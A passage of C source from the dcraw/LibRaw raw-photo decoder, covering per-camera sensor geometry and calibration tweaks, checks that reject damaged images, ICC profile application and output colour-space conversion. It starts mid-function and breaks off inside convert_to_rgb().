load_flags=0;
} else if (!strncmp(model,"COOLPIX P",9) && raw_width != 4032) {
load_flags = 24;
filters = 0x94949494;
if (model[9] == '7' && (iso_speed >= 400 || iso_speed==0) && !strstr(software,"V1.2") )
black = 255;
} else if (!strncmp(model,"1 ",2)) {
height -= 2;
} else if (fsize == 1581060) {
simple_coeff(3);
pre_mul[0] = 1.2085;
pre_mul[1] = 1.0943;
pre_mul[3] = 1.1103;
} else if (fsize == 3178560) {
cam_mul[0] *= 4;
cam_mul[2] *= 4;
} else if (fsize == 4771840) {
if (!timestamp && nikon_e995())
strcpy (model, "E995");
if (strcmp(model,"E995")) {
filters = 0xb4b4b4b4;
simple_coeff(3);
pre_mul[0] = 1.196;
pre_mul[1] = 1.246;
pre_mul[2] = 1.018;
}
} else if (fsize == 2940928) {
if (!timestamp && !nikon_e2100())
strcpy (model,"E2500");
if (!strcmp(model,"E2500")) {
height -= 2;
load_flags = 6;
colors = 4;
filters = 0x4b4b4b4b;
}
} else if (fsize == 4775936) {
if (!timestamp) nikon_3700();
if (model[0] == 'E' && atoi(model+1) < 3700)
filters = 0x49494949;
if (!strcmp(model,"Optio 33WR")) {
flip = 1;
filters = 0x16161616;
}
if (make[0] == 'O') {
i = find_green (12, 32, 1188864, 3576832);
c = find_green (12, 32, 2383920, 2387016);
if (abs(i) < abs(c)) {
SWAP(i,c);
load_flags = 24;
}
if (i < 0) filters = 0x61616161;
}
} else if (fsize == 5869568) {
if (!timestamp && minolta_z2()) {
strcpy (make, "Minolta");
strcpy (model,"DiMAGE Z2");
}
load_flags = 6 + 24*(make[0] == 'M');
} else if (fsize == 6291456) {
fseek (ifp, 0x300000, SEEK_SET);
if ((order = guess_byte_order(0x10000)) == 0x4d4d) {
height -= (top_margin = 16);
width -= (left_margin = 28);
maximum = 0xf5c0;
strcpy (make, "ISG");
model[0] = 0;
}
} else if (!strncmp(make,"Fujifilm",8)) {
if (!strcmp(model+7,"S2Pro")) {
strcpy (model,"S2Pro");
height = 2144;
width = 2880;
flip = 6;
} else if (load_raw != &CLASS packed_load_raw)
maximum = (is_raw == 2 && shot_select) ? 0x2f00 : 0x3e00;
top_margin = (raw_height - height) >> 2 << 1;
left_margin = (raw_width - width ) >> 2 << 1;
if (width == 2848 || width == 3664) filters = 0x16161616;
if (width == 4032 || width == 4952) left_margin = 0;
if (width == 3328 && (width -= 66)) left_margin = 34;
if (width == 4936) left_margin = 4;
if (width == 6032) left_margin = 0;
if (!strcmp(model,"HS50EXR") ||
!strcmp(model,"F900EXR")) {
width += 2;
left_margin = 0;
filters = 0x16161616;
}
if(!strcmp(model,"S5500"))
{
height -= (top_margin=6);
}
if (fuji_layout) raw_width *= is_raw;
if (filters == 9)
FORC(36) ((char *)xtrans)[c] =
xtrans_abs[(c/6+top_margin) % 6][(c+left_margin) % 6];
} else if (!strcmp(model,"KD-400Z")) {
height = 1712;
width = 2312;
raw_width = 2336;
goto konica_400z;
} else if (!strcmp(model,"KD-510Z")) {
goto konica_510z;
} else if (!strncasecmp(make,"Minolta",7)) {
if (!load_raw && (maximum = 0xfff))
load_raw = &CLASS unpacked_load_raw;
if (!strncmp(model,"DiMAGE A",8)) {
if (!strcmp(model,"DiMAGE A200"))
filters = 0x49494949;
tiff_bps = 12;
load_raw = &CLASS packed_load_raw;
} else if (!strncmp(model,"ALPHA",5) ||
!strncmp(model,"DYNAX",5) ||
!strncmp(model,"MAXXUM",6)) {
sprintf (model+20, "DYNAX %-10s", model+6+(model[0]=='M'));
adobe_coeff (make, model+20);
load_raw = &CLASS packed_load_raw;
} else if (!strncmp(model,"DiMAGE G",8)) {
if (model[8] == '4') {
height = 1716;
width = 2304;
} else if (model[8] == '5') {
konica_510z:
height = 1956;
width = 2607;
raw_width = 2624;
} else if (model[8] == '6') {
height = 2136;
width = 2848;
}
data_offset += 14;
filters = 0x61616161;
konica_400z:
load_raw = &CLASS unpacked_load_raw;
maximum = 0x3df;
order = 0x4d4d;
}
} else if (!strcmp(model,"*ist D")) {
load_raw = &CLASS unpacked_load_raw;
data_error = -1;
} else if (!strcmp(model,"*ist DS")) {
height -= 2;
} else if (!strncmp(make,"Samsung",7) && raw_width == 4704) {
height -= top_margin = 8;
width -= 2 * (left_margin = 8);
load_flags = 32;
} else if (!strncmp(make,"Samsung",7) && !strcmp(model,"NX3000")) {
top_margin = 24;
left_margin = 64;
width = 5472;
height = 3648;
filters = 0x61616161;
colors = 3;
} else if (!strncmp(make,"Samsung",7) && raw_height == 3714) {
height -= top_margin = 18;
left_margin = raw_width - (width = 5536);
if (raw_width != 5600)
left_margin = top_margin = 0;
filters = 0x61616161;
colors = 3;
} else if (!strncmp(make,"Samsung",7) && raw_width == 5632) {
order = 0x4949;
height = 3694;
top_margin = 2;
width = 5574 - (left_margin = 32 + tiff_bps);
if (tiff_bps == 12) load_flags = 80;
} else if (!strncmp(make,"Samsung",7) && raw_width == 5664) {
height -= top_margin = 17;
left_margin = 96;
width = 5544;
filters = 0x49494949;
} else if (!strncmp(make,"Samsung",7) && raw_width == 6496) {
filters = 0x61616161;
#ifdef LIBRAW_LIBRARY_BUILD
if(!black && !cblack[0] && !cblack[1] && !cblack[2] && !cblack[3])
#endif
black = 1 << (tiff_bps - 7);
} else if (!strcmp(model,"EX1")) {
order = 0x4949;
height -= 20;
top_margin = 2;
if ((width -= 6) > 3682) {
height -= 10;
width -= 46;
top_margin = 8;
}
} else if (!strcmp(model,"WB2000")) {
order = 0x4949;
height -= 3;
top_margin = 2;
if ((width -= 10) > 3718) {
height -= 28;
width -= 56;
top_margin = 8;
}
} else if (strstr(model,"WB550")) {
strcpy (model, "WB550");
} else if (!strcmp(model,"EX2F")) {
height = 3030;
width = 4040;
top_margin = 15;
left_margin=24;
order = 0x4949;
filters = 0x49494949;
load_raw = &CLASS unpacked_load_raw;
} else if (!strcmp(model,"STV680 VGA")) {
black = 16;
} else if (!strcmp(model,"N95")) {
height = raw_height - (top_margin = 2);
} else if (!strcmp(model,"640x480")) {
gamma_curve (0.45, 4.5, 1, 255);
} else if (!strncmp(make,"Hasselblad",10)) {
if (load_raw == &CLASS lossless_jpeg_load_raw)
load_raw = &CLASS hasselblad_load_raw;
if (raw_width == 7262) {
height = 5444;
width = 7248;
top_margin = 4;
left_margin = 7;
filters = 0x61616161;
if(!strncasecmp(model,"H3D",3))
{
adobe_coeff("Hasselblad","H3DII-39");
strcpy(model,"H3DII-39");
}
} else if (raw_width == 7410 || raw_width == 8282) {
height -= 84;
width -= 82;
top_margin = 4;
left_margin = 41;
filters = 0x61616161;
adobe_coeff("Hasselblad","H4D-40");
strcpy(model,"H4D-40");
}
else if( raw_width == 8384) // X1D
{
top_margin = 96;
height -= 96;
left_margin = 48;
width -= 106;
adobe_coeff("Hasselblad","X1D");
}
else if (raw_width == 9044) {
if(black > 500)
{
top_margin = 12;
left_margin = 44;
width = 8956;
height = 6708;
memset(cblack,0,sizeof(cblack));
adobe_coeff("Hasselblad","H4D-60");
strcpy(model,"H4D-60");
black = 512;
}
else
{
height = 6716;
width = 8964;
top_margin = 8;
left_margin = 40;
black += load_flags = 256;
maximum = 0x8101;
strcpy(model,"H3DII-60");
}
} else if (raw_width == 4090) {
strcpy (model, "V96C");
height -= (top_margin = 6);
width -= (left_margin = 3) + 7;
filters = 0x61616161;
} else if (raw_width == 8282 && raw_height == 6240) {
if(!strncasecmp(model,"H5D",3))
{
/* H5D 50*/
left_margin = 54;
top_margin = 16;
width = 8176;
height = 6132;
black = 256;
strcpy(model,"H5D-50");
}
else if(!strncasecmp(model,"H3D",3))
{
black=0;
left_margin = 54;
top_margin = 16;
width = 8176;
height = 6132;
memset(cblack,0,sizeof(cblack));
adobe_coeff("Hasselblad","H3D-50");
strcpy(model,"H3D-50");
}
} else if (raw_width == 8374 && raw_height == 6304) {
/* H5D 50c*/
left_margin = 52;
top_margin = 100;
width = 8272;
height = 6200;
black = 256;
strcpy(model,"H5D-50c");
}
if (tiff_samples > 1) {
is_raw = tiff_samples+1;
if (!shot_select && !half_size) filters = 0;
}
} else if (!strncmp(make,"Sinar",5)) {
if (!load_raw) load_raw = &CLASS unpacked_load_raw;
if (is_raw > 1 && !shot_select && !half_size) filters = 0;
maximum = 0x3fff;
} else if (!strncmp(make,"Leaf",4)) {
maximum = 0x3fff;
fseek (ifp, data_offset, SEEK_SET);
if (ljpeg_start (&jh, 1) && jh.bits == 15)
maximum = 0x1fff;
if (tiff_samples > 1) filters = 0;
if (tiff_samples > 1 || tile_length < raw_height) {
load_raw = &CLASS leaf_hdr_load_raw;
raw_width = tile_width;
}
if ((width | height) == 2048) {
if (tiff_samples == 1) {
filters = 1;
strcpy (cdesc, "RBTG");
strcpy (model, "CatchLight");
top_margin = 8; left_margin = 18; height = 2032; width = 2016;
} else {
strcpy (model, "DCB2");
top_margin = 10; left_margin = 16; height = 2028; width = 2022;
}
} else if (width+height == 3144+2060) {
if (!model[0]) strcpy (model, "Cantare");
if (width > height) {
top_margin = 6; left_margin = 32; height = 2048; width = 3072;
filters = 0x61616161;
} else {
left_margin = 6; top_margin = 32; width = 2048; height = 3072;
filters = 0x16161616;
}
if (!cam_mul[0] || model[0] == 'V') filters = 0;
else is_raw = tiff_samples;
} else if (width == 2116) {
strcpy (model, "Valeo 6");
height -= 2 * (top_margin = 30);
width -= 2 * (left_margin = 55);
filters = 0x49494949;
} else if (width == 3171) {
strcpy (model, "Valeo 6");
height -= 2 * (top_margin = 24);
width -= 2 * (left_margin = 24);
filters = 0x16161616;
}
} else if (!strncmp(make,"Leica",5) || !strncmp(make,"Panasonic",9)
|| !strncasecmp(make,"YUNEEC",6)) {
if (raw_width > 0 && ((flen - data_offset) / (raw_width*8/7) == raw_height))
load_raw = &CLASS panasonic_load_raw;
if (!load_raw) {
load_raw = &CLASS unpacked_load_raw;
load_flags = 4;
}
zero_is_bad = 1;
if ((height += 12) > raw_height) height = raw_height;
for (i=0; i < sizeof pana / sizeof *pana; i++)
if (raw_width == pana[i][0] && raw_height == pana[i][1]) {
left_margin = pana[i][2];
top_margin = pana[i][3];
width += pana[i][4];
height += pana[i][5];
}
filters = 0x01010101 * (uchar) "\x94\x61\x49\x16"
[((filters-1) ^ (left_margin & 1) ^ (top_margin << 1)) & 3];
} else if (!strcmp(model,"C770UZ")) {
height = 1718;
width = 2304;
filters = 0x16161616;
load_raw = &CLASS packed_load_raw;
load_flags = 30;
} else if (!strncmp(make,"Olympus",7)) {
height += height & 1;
if (exif_cfa) filters = exif_cfa;
if (width == 4100) width -= 4;
if (width == 4080) width -= 24;
if (width == 9280) { width -= 6; height -= 6; }
if (load_raw == &CLASS unpacked_load_raw)
load_flags = 4;
tiff_bps = 12;
if (!strcmp(model,"E-300") ||
!strcmp(model,"E-500")) {
width -= 20;
if (load_raw == &CLASS unpacked_load_raw) {
maximum = 0xfc3;
memset (cblack, 0, sizeof cblack);
}
} else if (!strcmp(model,"STYLUS1")) {
width -= 14;
maximum = 0xfff;
} else if (!strcmp(model,"E-330")) {
width -= 30;
if (load_raw == &CLASS unpacked_load_raw)
maximum = 0xf79;
} else if (!strcmp(model,"SP550UZ")) {
thumb_length = flen - (thumb_offset = 0xa39800);
thumb_height = 480;
thumb_width = 640;
} else if (!strcmp(model,"TG-4")) {
width -= 16;
}
} else if (!strcmp(model,"N Digital")) {
height = 2047;
width = 3072;
filters = 0x61616161;
data_offset = 0x1a00;
load_raw = &CLASS packed_load_raw;
} else if (!strcmp(model,"DSC-F828")) {
width = 3288;
left_margin = 5;
mask[1][3] = -17;
data_offset = 862144;
load_raw = &CLASS sony_load_raw;
filters = 0x9c9c9c9c;
colors = 4;
strcpy (cdesc, "RGBE");
} else if (!strcmp(model,"DSC-V3")) {
width = 3109;
left_margin = 59;
mask[0][1] = 9;
data_offset = 787392;
load_raw = &CLASS sony_load_raw;
} else if (!strncmp(make,"Sony",4) && raw_width == 3984) {
width = 3925;
order = 0x4d4d;
} else if (!strncmp(make,"Sony",4) && raw_width == 4288) {
width -= 32;
} else if (!strcmp(make, "Sony") && raw_width == 4600) {
if (!strcmp(model, "DSLR-A350"))
height -= 4;
black = 0;
} else if (!strncmp(make,"Sony",4) && raw_width == 4928) {
if (height < 3280) width -= 8;
} else if (!strncmp(make,"Sony",4) && raw_width == 5504) { // ILCE-3000//5000
width -= height > 3664 ? 8 : 32;
} else if (!strncmp(make,"Sony",4) && raw_width == 6048) {
width -= 24;
if (strstr(model,"RX1") || strstr(model,"A99"))
width -= 6;
} else if (!strncmp(make,"Sony",4) && raw_width == 7392) {
width -= 30;
} else if (!strncmp(make,"Sony",4) && raw_width == 8000) {
width -= 32;
if (!strncmp(model, "DSC", 3)) {
tiff_bps = 14;
load_raw = &CLASS unpacked_load_raw;
}
} else if (!strcmp(model,"DSLR-A100")) {
if (width == 3880) {
height--;
width = ++raw_width;
} else {
height -= 4;
width -= 4;
order = 0x4d4d;
load_flags = 2;
}
filters = 0x61616161;
} else if (!strcmp(model,"PIXL")) {
height -= top_margin = 4;
width -= left_margin = 32;
gamma_curve (0, 7, 1, 255);
} else if (!strcmp(model,"C603") || !strcmp(model,"C330")
|| !strcmp(model,"12MP")) {
order = 0x4949;
if (filters && data_offset) {
fseek (ifp, data_offset < 4096 ? 168 : 5252, SEEK_SET);
read_shorts (curve, 256);
} else gamma_curve (0, 3.875, 1, 255);
load_raw = filters ? &CLASS eight_bit_load_raw :
strcmp(model,"C330") ? &CLASS kodak_c603_load_raw :
&CLASS kodak_c330_load_raw;
load_flags = tiff_bps > 16;
tiff_bps = 8;
} else if (!strncasecmp(model,"EasyShare",9)) {
data_offset = data_offset < 0x15000 ? 0x15000 : 0x17000;
load_raw = &CLASS packed_load_raw;
} else if (!strncasecmp(make,"Kodak",5)) {
if (filters == UINT_MAX) filters = 0x61616161;
if (!strncmp(model,"NC2000",6) ||
!strncmp(model,"EOSDCS",6) ||
!strncmp(model,"DCS4",4)) {
width -= 4;
left_margin = 2;
if (model[6] == ' ') model[6] = 0;
if (!strcmp(model,"DCS460A")) goto bw;
} else if (!strcmp(model,"DCS660M")) {
black = 214;
goto bw;
} else if (!strcmp(model,"DCS760M")) {
bw: colors = 1;
filters = 0;
}
if (!strcmp(model+4,"20X"))
strcpy (cdesc, "MYCY");
if (strstr(model,"DC25")) {
strcpy (model, "DC25");
data_offset = 15424;
}
if (!strncmp(model,"DC2",3)) {
raw_height = 2 + (height = 242);
if (!strncmp(model, "DC290", 5))
iso_speed = 100;
if (!strncmp(model, "DC280", 5))
iso_speed = 70;
if (flen < 100000) {
raw_width = 256; width = 249;
pixel_aspect = (4.0*height) / (3.0*width);
} else {
raw_width = 512; width = 501;
pixel_aspect = (493.0*height) / (373.0*width);
}
top_margin = left_margin = 1;
colors = 4;
filters = 0x8d8d8d8d;
simple_coeff(1);
pre_mul[1] = 1.179;
pre_mul[2] = 1.209;
pre_mul[3] = 1.036;
load_raw = &CLASS eight_bit_load_raw;
} else if (!strcmp(model,"40")) {
strcpy (model, "DC40");
height = 512;
width = 768;
data_offset = 1152;
load_raw = &CLASS kodak_radc_load_raw;
tiff_bps = 12;
} else if (strstr(model,"DC50")) {
strcpy (model, "DC50");
height = 512;
width = 768;
iso_speed=84;
data_offset = 19712;
load_raw = &CLASS kodak_radc_load_raw;
} else if (strstr(model,"DC120")) {
strcpy (model, "DC120");
height = 976;
width = 848;
iso_speed=160;
pixel_aspect = height/0.75/width;
load_raw = tiff_compress == 7 ?
&CLASS kodak_jpeg_load_raw : &CLASS kodak_dc120_load_raw;
} else if (!strcmp(model,"DCS200")) {
thumb_height = 128;
thumb_width = 192;
thumb_offset = 6144;
thumb_misc = 360;
iso_speed=140;
write_thumb = &CLASS layer_thumb;
black = 17;
}
} else if (!strcmp(model,"Fotoman Pixtura")) {
height = 512;
width = 768;
data_offset = 3632;
load_raw = &CLASS kodak_radc_load_raw;
filters = 0x61616161;
simple_coeff(2);
} else if (!strncmp(model,"QuickTake",9)) {
if (head[5]) strcpy (model+10, "200");
fseek (ifp, 544, SEEK_SET);
height = get2();
width = get2();
data_offset = (get4(),get2()) == 30 ? 738:736;
if (height > width) {
SWAP(height,width);
fseek (ifp, data_offset-6, SEEK_SET);
flip = ~get2() & 3 ? 5:6;
}
filters = 0x61616161;
} else if (!strncmp(make,"Rollei",6) && !load_raw) {
switch (raw_width) {
case 1316:
height = 1030;
width = 1300;
top_margin = 1;
left_margin = 6;
break;
case 2568:
height = 1960;
width = 2560;
top_margin = 2;
left_margin = 8;
}
filters = 0x16161616;
load_raw = &CLASS rollei_load_raw;
}
else if (!strcmp(model,"GRAS-50S5C")) {
height = 2048;
width = 2440;
load_raw = &CLASS unpacked_load_raw;
data_offset = 0;
filters = 0x49494949;
order = 0x4949;
maximum = 0xfffC;
} else if (!strcmp(model,"BB-500CL")) {
height = 2058;
width = 2448;
load_raw = &CLASS unpacked_load_raw;
data_offset = 0;
filters = 0x94949494;
order = 0x4949;
maximum = 0x3fff;
} else if (!strcmp(model,"BB-500GE")) {
height = 2058;
width = 2456;
load_raw = &CLASS unpacked_load_raw;
data_offset = 0;
filters = 0x94949494;
order = 0x4949;
maximum = 0x3fff;
} else if (!strcmp(model,"SVS625CL")) {
height = 2050;
width = 2448;
load_raw = &CLASS unpacked_load_raw;
data_offset = 0;
filters = 0x94949494;
order = 0x4949;
maximum = 0x0fff;
}
/* Early reject for damaged images */
if (!load_raw || height < 22 || width < 22 ||
#ifdef LIBRAW_LIBRARY_BUILD
(tiff_bps > 16 && load_raw != &LibRaw::deflate_dng_load_raw)
#else
tiff_bps > 16
#endif
|| tiff_samples > 4 || colors > 4 || colors < 1
/* alloc in unpack() may be fooled by size adjust */
|| ( (int)width + (int)left_margin > 65535)
|| ( (int)height + (int)top_margin > 65535)
)
{
is_raw = 0;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_IDENTIFY,1,2);
#endif
return;
}
if (!model[0])
sprintf (model, "%dx%d", width, height);
if (filters == UINT_MAX) filters = 0x94949494;
if (thumb_offset && !thumb_height) {
fseek (ifp, thumb_offset, SEEK_SET);
if (ljpeg_start (&jh, 1)) {
thumb_width = jh.wide;
thumb_height = jh.high;
}
}
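/* DNG files re-enter here, skipping the make/model-specific
   adjustments above. */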
dng_skip:
#ifdef LIBRAW_LIBRARY_BUILD
if(dng_version) /* Override black level by DNG tags */
{
black = imgdata.color.dng_levels.dng_black;
int ll = LIM(0,
(sizeof(cblack)/sizeof(cblack[0])),
(sizeof(imgdata.color.dng_levels.dng_cblack)/sizeof(imgdata.color.dng_levels.dng_cblack[0])));
for(int i=0; i < ll; i++)
cblack[i] = imgdata.color.dng_levels.dng_cblack[i];
}
#endif
/* Early reject for damaged images */
if (!load_raw || height < 22 || width < 22 ||
#ifdef LIBRAW_LIBRARY_BUILD
(tiff_bps > 16 && load_raw != &LibRaw::deflate_dng_load_raw)
#else
tiff_bps > 16
#endif
|| tiff_samples > 4 || colors > 4 || colors < 1)
{
is_raw = 0;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_IDENTIFY,1,2);
#endif
return;
}
if ((use_camera_matrix & ((use_camera_wb || dng_version) | 0x2) )
&& cmatrix[0][0] > 0.125) {
memcpy (rgb_cam, cmatrix, sizeof cmatrix);
raw_color = 0;
}
if (raw_color) adobe_coeff (make, model);
#ifdef LIBRAW_LIBRARY_BUILD
else if(imgdata.color.cam_xyz[0][0]<0.01)
adobe_coeff (make, model,1);
#endif
if (load_raw == &CLASS kodak_radc_load_raw)
if (raw_color) adobe_coeff ("Apple","Quicktake");
#ifdef LIBRAW_LIBRARY_BUILD
// Clear erroneous fuji_width if not set through parse_fuji or for DNG
if(fuji_width && !dng_version && !(imgdata.process_warnings & LIBRAW_WARN_PARSEFUJI_PROCESSED ))
fuji_width = 0;
#endif
if (fuji_width)
{
fuji_width = width >> !fuji_layout;
filters = fuji_width & 1 ? 0x94949494 : 0x49494949;
width = (height >> fuji_layout) + fuji_width;
height = width - 1;
pixel_aspect = 1;
} else {
if (raw_height < height) raw_height = height;
if (raw_width < width ) raw_width = width;
}
if (!tiff_bps) tiff_bps = 12;
if (!maximum)
{
maximum = (1 << tiff_bps) - 1;
if(maximum < 0x10000 && curve[maximum]>0 && load_raw == &CLASS sony_arw2_load_raw)
maximum = curve[maximum];
}
if (!load_raw || height < 22 || width < 22 ||
#ifdef LIBRAW_LIBRARY_BUILD
(tiff_bps > 16 && load_raw != &LibRaw::deflate_dng_load_raw)
#else
tiff_bps > 16
#endif
|| tiff_samples > 6 || colors > 4)
is_raw = 0;
if(raw_width < 22 || raw_width > 64000 || raw_height < 22 || raw_height > 64000)
is_raw = 0;
#ifdef NO_JASPER
if (load_raw == &CLASS redcine_load_raw) {
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s: You must link dcraw with %s!!\n"),
ifname, "libjasper");
#endif
is_raw = 0;
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_NO_JASPER;
#endif
}
#endif
#ifdef NO_JPEG
if (load_raw == &CLASS kodak_jpeg_load_raw ||
load_raw == &CLASS lossy_dng_load_raw) {
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s: You must link dcraw with %s!!\n"),
ifname, "libjpeg");
#endif
is_raw = 0;
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_NO_JPEGLIB;
#endif
}
#endif
if (!cdesc[0])
strcpy (cdesc, colors == 3 ? "RGBG":"GMCY");
if (!raw_height) raw_height = height;
if (!raw_width ) raw_width = width;
if (filters > 999 && colors == 3)
filters |= ((filters >> 2 & 0x22222222) |
(filters << 2 & 0x88888888)) & filters << 1;
notraw:
if (flip == UINT_MAX) flip = tiff_flip;
if (flip == UINT_MAX) flip = 0;
// Convert from degrees to bit-field if needed
if(flip > 89 || flip < -89)
{
switch ((flip+3600) % 360)
{
case 270: flip = 5; break;
case 180: flip = 3; break;
case 90: flip = 6; break;
}
}
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_IDENTIFY,1,2);
#endif
}
//@end COMMON
//@out FILEIO
#ifndef NO_LCMS
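/* Apply an input (camera) ICC profile -- read from a file, or embedded in
   the raw when "embed" is given -- and an output profile (a file, or sRGB
   when none is given) to the interpolated image using LittleCMS. On
   success the camera matrix is disabled (raw_color = 1). */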
void CLASS apply_profile (const char *input, const char *output)
{
char *prof;
cmsHPROFILE hInProfile=0, hOutProfile=0;
cmsHTRANSFORM hTransform;
FILE *fp;
unsigned size;
if (strcmp (input, "embed"))
hInProfile = cmsOpenProfileFromFile (input, "r");
else if (profile_length) {
#ifndef LIBRAW_LIBRARY_BUILD
prof = (char *) malloc (profile_length);
merror (prof, "apply_profile()");
fseek (ifp, profile_offset, SEEK_SET);
fread (prof, 1, profile_length, ifp);
hInProfile = cmsOpenProfileFromMem (prof, profile_length);
free (prof);
#else
hInProfile = cmsOpenProfileFromMem (imgdata.color.profile, profile_length);
#endif
} else
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_NO_EMBEDDED_PROFILE;
#endif
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s has no embedded profile.\n"), ifname);
#endif
}
if (!hInProfile)
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_NO_INPUT_PROFILE;
#endif
return;
}
if (!output)
hOutProfile = cmsCreate_sRGBProfile();
else if ((fp = fopen (output, "rb"))) {
fread (&size, 4, 1, fp);
fseek (fp, 0, SEEK_SET);
oprof = (unsigned *) malloc (size = ntohl(size));
merror (oprof, "apply_profile()");
fread (oprof, 1, size, fp);
fclose (fp);
if (!(hOutProfile = cmsOpenProfileFromMem (oprof, size))) {
free (oprof);
oprof = 0;
}
}
#ifdef DCRAW_VERBOSE
else
fprintf (stderr,_("Cannot open file %s!\n"), output);
#endif
if (!hOutProfile)
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_BAD_OUTPUT_PROFILE;
#endif
goto quit;
}
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr,_("Applying color profile...\n"));
#endif
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_APPLY_PROFILE,0,2);
#endif
hTransform = cmsCreateTransform (hInProfile, TYPE_RGBA_16,
hOutProfile, TYPE_RGBA_16, INTENT_PERCEPTUAL, 0);
cmsDoTransform (hTransform, image, image, width*height);
raw_color = 1; /* Don't use rgb_cam with a profile */
cmsDeleteTransform (hTransform);
cmsCloseProfile (hOutProfile);
quit:
cmsCloseProfile (hInProfile);
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_APPLY_PROFILE,1,2);
#endif
}
#endif
//@end FILEIO
//@out COMMON
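/* Convert camera RGB to the selected output colorspace: compose
   out_cam = output_primaries * rgb_cam, synthesize a small ICC profile
   (oprof) describing that space, then transform the pixels and build
   the per-channel histograms. */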
void CLASS convert_to_rgb()
{
#ifndef LIBRAW_LIBRARY_BUILD
int row, col, c;
#endif
int i, j, k;
#ifndef LIBRAW_LIBRARY_BUILD
ushort *img;
float out[3];
#endif
float out_cam[3][4];
double num, inverse[3][3];
static const double xyzd50_srgb[3][3] =
{ { 0.436083, 0.385083, 0.143055 },
{ 0.222507, 0.716888, 0.060608 },
{ 0.013930, 0.097097, 0.714022 } };
static const double rgb_rgb[3][3] =
{ { 1,0,0 }, { 0,1,0 }, { 0,0,1 } };
static const double adobe_rgb[3][3] =
{ { 0.715146, 0.284856, 0.000000 },
{ 0.000000, 1.000000, 0.000000 },
{ 0.000000, 0.041166, 0.958839 } };
static const double wide_rgb[3][3] =
{ { 0.593087, 0.404710, 0.002206 },
{ 0.095413, 0.843149, 0.061439 },
{ 0.011621, 0.069091, 0.919288 } };
static const double prophoto_rgb[3][3] =
{ { 0.529317, 0.330092, 0.140588 },
{ 0.098368, 0.873465, 0.028169 },
{ 0.016879, 0.117663, 0.865457 } };
static const double aces_rgb[3][3] =
{ { 0.432996, 0.375380, 0.189317 },
{ 0.089427, 0.816523, 0.102989 },
{ 0.019165, 0.118150, 0.941914 } };
static const double (*out_rgb[])[3] =
{ rgb_rgb, adobe_rgb, wide_rgb, prophoto_rgb, xyz_rgb, aces_rgb };
static const char *name[] =
{ "sRGB", "Adobe RGB (1998)", "WideGamut D65", "ProPhoto D65", "XYZ", "ACES" };
static const unsigned phead[] =
{ 1024, 0, 0x2100000, 0x6d6e7472, 0x52474220, 0x58595a20, 0, 0, 0,
0x61637370, 0, 0, 0x6e6f6e65, 0, 0, 0, 0, 0xf6d6, 0x10000, 0xd32d };
unsigned pbody[] =
{ 10, 0x63707274, 0, 36, /* cprt */
0x64657363, 0, 40, /* desc */
0x77747074, 0, 20, /* wtpt */
0x626b7074, 0, 20, /* bkpt */
0x72545243, 0, 14, /* rTRC */
0x67545243, 0, 14, /* gTRC */
0x62545243, 0, 14, /* bTRC */
0x7258595a, 0, 20, /* rXYZ */
0x6758595a, 0, 20, /* gXYZ */
0x6258595a, 0, 20 }; /* bXYZ */
static const unsigned pwhite[] = { 0xf351, 0x10000, 0x116cc };
unsigned pcurve[] = { 0x63757276, 0, 1, 0x1000000 };
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_CONVERT_RGB,0,2);
#endif
gamma_curve (gamm[0], gamm[1], 0, 0);
memcpy (out_cam, rgb_cam, sizeof out_cam);
#ifndef LIBRAW_LIBRARY_BUILD
raw_color |= colors == 1 || document_mode ||
output_color < 1 || output_color > 6;
#else
raw_color |= colors == 1 ||
output_color < 1 || output_color > 6;
#endif
if (!raw_color) {
oprof = (unsigned *) calloc (phead[0], 1);
merror (oprof, "convert_to_rgb()");
memcpy (oprof, phead, sizeof phead);
if (output_color == 5) oprof[4] = oprof[5];
oprof[0] = 132 + 12*pbody[0];
for (i=0; i < pbody[0]; i++) {
oprof[oprof[0]/4] = i ? (i > 1 ? 0x58595a20 : 0x64657363) : 0x74657874;
pbody[i*3+2] = oprof[0];
oprof[0] += (pbody[i*3+3] + 3) & -4;
}
memcpy (oprof+32, pbody, sizeof pbody);
oprof[pbody[5]/4+2] = strlen(name[output_color-1]) + 1;
memcpy ((char *)oprof+pbody[8]+8, pwhite, sizeof pwhite);
pcurve[3] = (short)(256/gamm[5]+0.5) << 16;
for (i=4; i < 7; i++)
memcpy ((char *)oprof+pbody[i*3+2], pcurve, sizeof pcurve);
pseudoinverse ((double (*)[3]) out_rgb[output_color-1], inverse, 3);
for (i=0; i < 3; i++)
for (j=0; j < 3; j++) {
for (num = k=0; k < 3; k++)
num += xyzd50_srgb[i][k] * inverse[j][k];
oprof[pbody[j*3+23]/4+i+2] = num * 0x10000 + 0.5;
}
for (i=0; i < phead[0]/4; i++)
oprof[i] = htonl(oprof[i]);
strcpy ((char *)oprof+pbody[2]+8, "auto-generated by dcraw");
strcpy ((char *)oprof+pbody[5]+12, name[output_color-1]);
for (i=0; i < 3; i++)
for (j=0; j < colors; j++)
for (out_cam[i][j] = k=0; k < 3; k++)
out_cam[i][j] += out_rgb[output_color-1][i][k] * rgb_cam[k][j];
}
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr, raw_color ? _("Building histograms...\n") :
_("Converting to %s colorspace...\n"), name[output_color-1]);
#endif
#ifdef LIBRAW_LIBRARY_BUILD
convert_to_rgb_loop(out_cam);
#else
memset (histogram, 0, sizeof histogram);
for (img=image[0], row=0; row < height; row++)
for (col=0; col < width; col++, img+=4) {
if (!raw_color) {
